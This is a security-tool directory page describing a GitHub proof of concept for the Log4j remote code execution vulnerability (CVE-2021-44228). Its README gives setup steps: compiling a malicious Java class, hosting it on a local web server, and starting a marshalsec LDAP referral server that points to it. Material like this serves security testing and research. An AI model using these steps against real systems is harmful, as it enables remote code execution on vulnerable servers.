Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/grupo-kapa-7/cve-2021-44228-log4j-poc-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubgrupo-kapa-7/cve-2021-44228-log4j-poc-rce

CVE-2021-44228-Log4j-PoC-RCE

PoC RCE Log4j CVE-2021-4428 para pruebas

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
114 years agoNot yet reviewed
Share

Apache Log4j CVE-2021-44228 GK7 PoC

Steps

  1. Compile Log4jRCE.java and move the .class file to a web server (e.g., local PHP)

    1. cd src/main/java
    2. javac Log4jRCE.java
    3. Move the .class file to a web server or start a local PHP server, for example: php -S 127.0.0.1:8888
  2. Start LDAP Server

    1. git clone [email protected]:Grupo-Kapa-7/marshalsec.git
    2. cd marshalsec
    3. mvn clean package -DskipTests
    4. start ldap server java -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
  • To test the PoC, modify the file src/main/java/log4j.java and change the LDAP server URL to your liking.

  • Original Repository

    https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

    Download Tool